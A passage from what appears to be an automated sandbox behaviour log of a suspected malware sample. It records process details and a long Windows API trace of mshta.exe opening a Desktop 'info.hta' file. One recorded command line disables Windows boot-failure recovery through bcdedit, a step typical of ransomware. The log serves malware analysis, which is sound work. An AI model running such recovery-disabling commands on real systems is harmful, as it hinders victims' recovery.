os_tid = 0x650 Thread: id = 178 os_tid = 0x578 Thread: id = 179 os_tid = 0x520 Thread: id = 180 os_tid = 0x7a4 Thread: id = 181 os_tid = 0x764 Thread: id = 182 os_tid = 0x740 Thread: id = 183 os_tid = 0x73c Thread: id = 184 os_tid = 0x734 Thread: id = 185 os_tid = 0x714 Thread: id = 186 os_tid = 0x270 Thread: id = 187 os_tid = 0x410 Thread: id = 188 os_tid = 0x4a0 Thread: id = 189 os_tid = 0x478 Thread: id = 190 os_tid = 0x474 Thread: id = 191 os_tid = 0x444 Thread: id = 192 os_tid = 0x438 Thread: id = 193 os_tid = 0x424 Thread: id = 194 os_tid = 0x224 Thread: id = 195 os_tid = 0x11c Thread: id = 196 os_tid = 0x120 Thread: id = 197 os_tid = 0x3fc Thread: id = 198 os_tid = 0x3f0 Thread: id = 199 os_tid = 0x3a4 Thread: id = 200 os_tid = 0x398 Thread: id = 201 os_tid = 0x384 Thread: id = 202 os_tid = 0x37c Thread: id = 209 os_tid = 0x748 Process: id = "26" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3d54d000" os_pid = "0x74c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "25" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0003fb61" [0xc000000f] Thread: id = 203 os_tid = 0x254 Thread: id = 204 os_tid = 0x268 Thread: id = 205 os_tid = 0x2b4 Thread: id = 206 os_tid = 0x530 Thread: id = 207 os_tid = 0x134 Thread: id = 208 os_tid = 0x580 Thread: id = 210 os_tid = 0x754 Process: id = "27" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x3bfa6000" os_pid = "0xc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x698" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 212 os_tid = 0x498 Process: id = "28" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x3d116000" os_pid = "0x380" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x5e8" cmd_line = "\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 216 os_tid = 0x390 [0213.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x41fc44 | out: lpSystemTimeAsFileTime=0x41fc44*(dwLowDateTime=0x80e81c50, dwHighDateTime=0x1d4f12b)) [0213.804] GetCurrentProcessId () returned 0x380 [0213.804] GetCurrentThreadId () returned 0x390 [0213.804] GetTickCount () returned 0x1e53f [0213.804] QueryPerformanceCounter (in: lpPerformanceCount=0x41fc3c | out: lpPerformanceCount=0x41fc3c*=17813036530) returned 1 [0213.805] GetModuleHandleA (lpModuleName=0x0) returned 0xb40000 [0213.805] GetStartupInfoA (in: lpStartupInfo=0x41fb50 | out: lpStartupInfo=0x41fb50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0213.805] GetVersionExA (in: lpVersionInformation=0x41fba0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x41fba0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0213.805] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2e0000 [0213.806] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0213.806] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0213.806] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0213.806] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0213.806] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0213.807] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.807] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.807] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.807] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.807] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.807] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.807] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.807] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.807] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.807] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.808] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.808] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.808] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.808] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.808] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.808] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.808] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x750a0000 [0213.808] GetProcAddress (hModule=0x750a0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x750b004f [0213.808] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.808] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.809] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.809] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.809] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.809] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.809] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.809] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.809] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.809] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.809] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.810] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.810] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.810] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.810] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.810] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.810] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.811] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.811] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.811] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.811] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x214) returned 0x2e07d0 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.811] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.811] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x750a0000 [0213.812] GetProcAddress (hModule=0x750a0000, lpProcName="EncodePointer") returned 0x76f50fcb [0213.812] GetProcAddress (hModule=0x750a0000, lpProcName="DecodePointer") returned 0x76f49d35 [0213.812] GetStartupInfoA (in: lpStartupInfo=0x41fad4 | out: lpStartupInfo=0x41fad4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0213.812] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x480) returned 0x2e09f0 [0213.812] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0213.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0213.812] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0213.812] SetHandleCount (uNumber=0x20) returned 0x20 [0213.812] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" " [0213.812] GetEnvironmentStringsW () returned 0x480190* [0213.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0213.812] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x565) returned 0x2e0e78 [0213.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2e0e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0213.812] FreeEnvironmentStringsW (penv=0x480190) returned 1 [0213.812] GetLastError () returned 0x0 [0213.812] SetLastError (dwErrCode=0x0) [0213.812] GetLastError () returned 0x0 [0213.812] SetLastError (dwErrCode=0x0) [0213.812] GetLastError () returned 0x0 [0213.812] SetLastError (dwErrCode=0x0) [0213.812] GetACP () returned 0x4e4 [0213.812] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x220) returned 0x2e13e8 [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.813] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x41faac | out: lpCPInfo=0x41faac) returned 1 [0213.813] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x41f578 | out: lpCPInfo=0x41f578) returned 1 [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.813] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x41f508 | out: lpCharType=0x41f508) returned 1 [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x41f2f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏´Ā") returned 256 [0213.813] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏´Ā", cchSrc=256, lpCharType=0x41f58c | out: lpCharType=0x41f58c) returned 1 [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x41f298, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ짆ꗔĀ") returned 256 [0213.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ짆ꗔĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0213.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ짆ꗔĀ", cchSrc=256, lpDestStr=0x41f088, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0213.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x41f88c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb2\xc7\xd4\xa5\xc4\xfa\x41", lpUsedDefaultChar=0x0) returned 256 [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41f98c, cbMultiByte=256, lpWideCharStr=0x41f2b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젦ꗔĀ") returned 256 [0213.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젦ꗔĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0213.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젦ꗔĀ", cchSrc=256, lpDestStr=0x41f0a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0213.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 